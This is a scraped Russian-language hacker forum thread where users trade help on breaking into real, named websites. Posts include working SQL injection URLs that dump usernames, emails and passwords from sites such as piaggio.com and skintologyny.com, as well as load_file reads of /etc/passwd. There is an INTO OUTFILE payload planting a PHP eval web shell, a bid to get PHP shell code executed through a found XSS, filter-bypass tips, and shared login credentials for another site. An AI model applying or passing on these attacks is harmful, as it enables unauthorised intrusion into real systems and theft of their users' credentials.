Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Можно ли как-нибудь обойти подстановку дефисов в '<?php'? Нашёл XSS, пытаюсь через неё загнать PHP код, как бы странно это не казалось.
    В поле с XSS пишу такое:
    Code:
    </div></html><?php
    //код шелла;
    ?>
    В итоге в конце страницы появляется
    Code:
    <!--?php
    //код шелла;
    ?-->
    Код, соотв., не выполняется. Это возможно обойти?
    Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg
     
  2. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    289
    Likes Received:
    55
    Reputations:
    20
    _http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
    Как раскрутить? Фильтрует union и select.
     
    #22182 Vip77, 12 May 2013
    Last edited: 12 May 2013
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.
     
  4. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    523
    Reputations:
    173
    Cennarios немного ошибся, фильтруется +
    [​IMG]

    В общем сам добил
    username
    [​IMG]


    password
    [​IMG]

    Пробелы убрать не забудь
     
    #22184 OxoTnik, 13 May 2013
    Last edited: 13 May 2013
    1 person likes this.
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    PHP:
    Сообщение от sabe   
    http
    ://www.skintologyny.com/admin/login.php
     
    http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23
     
    почему не могу войти?

    это ведь не от блога пароли указал а от users... а wp_users я не нашел такую таблицу в куррент дб, может кто угадает базу где блог..
    а вторая ссылка что ты скинул это верифай логин походу одно и то же что вход в админку почему не пускает оч интересно проблема не решена
    помогите узнать ответ)
     
  6. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Добрый день, подскажите, что это за БД такая, с рашрирениями файлов *.bcp, *.idx, *.pre и *.sch
    Спасибо
     
  7. x-promt

    x-promt New Member

    Joined:
    22 Apr 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите что делать далее? Вот нашлась уязвимость:

    Source: Form Method: POST
    Parameter Name Parameter Type Test Name Severity
    + userid POST SQL Injection (blind test) High
    + submit POST SQL Injection (blind test) High
    + m2hp COOKIE SQL Injection (blind test) High

    Как поступать дальше?
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Крутить как блайнды. Тебе же написали в каких параметрах SQL инъекты.
     
    _________________________
  9. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    День добрый!
    Есть ли возможность залить исполняймый файл в данном месте

    Code:
    http://play-me.ru/users/fileupload/edit
    Login:fileupload
    pass:fileupload
     
  10. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Есть уязвимый сайт:
    Code:
    http://www.site.com/?parametr1=parametr2&id=-99'
    при
    Code:
    +union+select+1,2+from+MSysModules2%00#
    и так далее выходит вот такая ошибка:

    Кто знает как раскурить такую скулю и в чем вообще проблма с ней?
     
  11. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    Есть скуль такого вида:
    site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
    Выводимые поля 2,5,6
    Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
    site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql.user+where+user='ask_user'
    На что получаю ошибку
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203


    Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
     
    #22191 Evil_Genius, 16 May 2013
    Last edited: 16 May 2013
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    всё правильно делаешь, ток может там ковычки фильтруются и из-за этого ошибка
     
  13. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    Че дурью то маяться?load_file('/etc/passwd') ; load_file('/home/site/public_html/ask.php')
     
  14. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету

    Через софт вот таким запросом выводит содержимое таблицы
    site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(select+concat(0x7e,0x27,unhex(Hex(cast(cms_config.config_name+as+char))),0x27,0x7e)+from+`site_db`.cms_config+limit+0,1)+,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--

    Както выводит содержимое нормально...Но как вывести этот file_priv то?:)
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,547
    Likes Received:
    1,242
    Reputations:
    273
    а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75

    файл прив так

    PHP:
    site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysqluser+limit+0,1
    и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно.
    если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое,
    его нужно по кускам выводить

    PHP:
    site.ru/ask.php?page=ask&cid=2+union+select+1,substr(load_file('какойто файл'),1,99),3,4,5,6
    и так дальше перебераешь
     
  17. w0rkX

    w0rkX New Member

    Joined:
    15 May 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе

    я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д

    как получить структуру, колонки и содержимое таблиц я знаю
    но вот с LIKE у меня не получается не могу понять почему

    чтобы было понятнее я хочу рассмотреть на примере
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD='
    есть инъекция

    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us  erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20  as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20  as%20nvarchar)%20from%20Piaggio..tbSSORegistration  %20where%20userid%3E1)--
    Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.

    в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword

    пробую через LIKE вывести имя таблицы в которой есть колонка emai
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--
    выводит
    Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

    пробовал указать базу
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
    пробовал и так
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr  om%20information_schema.tables%20where%20table_nam  e%20like%20'%25email%25')--
    подскажите плз кто знает как правильно запрос составить с LIKE
     
  18. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    Файл Прив нужен хотя бы чтобы узнать стоит ли возиться с данным сайтом или нафиг выбросить.
    Попробовал напрямую залиться, но всё пусто((
    site.ru/ask.php?page=ask&cid=2+union+select+1,`<?php eval($_REQUEST[cmd]); ?>`,3,4,5,6+from+mysql.user+into+outfile+`/home/site/subdomains/t44/www/images/1.php`

    Кавычки использовал прямые ' и косые ` и так и этак выдает ошибку:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203


    Перебор лимитом тоже не помогает при выводе файл прив.
    Лоад файл тоже не помогает как ты указал, выдает ошибки:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
     
  19. dpash

    dpash Member

    Joined:
    22 Mar 2013
    Messages:
    89
    Likes Received:
    39
    Reputations:
    4
    Помогите, пожалуйста, пока мозг не взорвался)
    Уязвимость - error based в POST запросе, но параметра такого вида: cell_coordinates=1_11, два числа, разделенных нижним подчеркиванием, координаты.
    И имя базы, и версия выводятся нормально:
    запрос:
    ответ:
    Но, как только идет запрос с "_", сразу вываливается синтаксическая ошибка, видимо поэтому с information_schema не получается вытащить имена таблиц, перебором нашел единственную таблицу items, ее данные вытаскиваются хорошо, но сайт на dle и все остальные таблицы с префиксом, и их даже перебором не подобрать:
    подбор без префикса
    ответ:
    с префиксом:
    ответ:
    Видимо параметр разделяется на два по нижнему подчеркиванию "_", и при наличии его в инъекции все идет хз как, как от него можно избавиться? Несколько страниц назад была такая же проблема, там советовали менять _ на %255f или %5f, не помогает
     
  20. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    909
    Likes Received:
    461
    Reputations:
    722
    dpash, попробуйте в качестве альтернативы подчеркивания использовать CHAR(тут код символа)
     
    _________________________
Loading...
Thread Status:
Not open for further replies.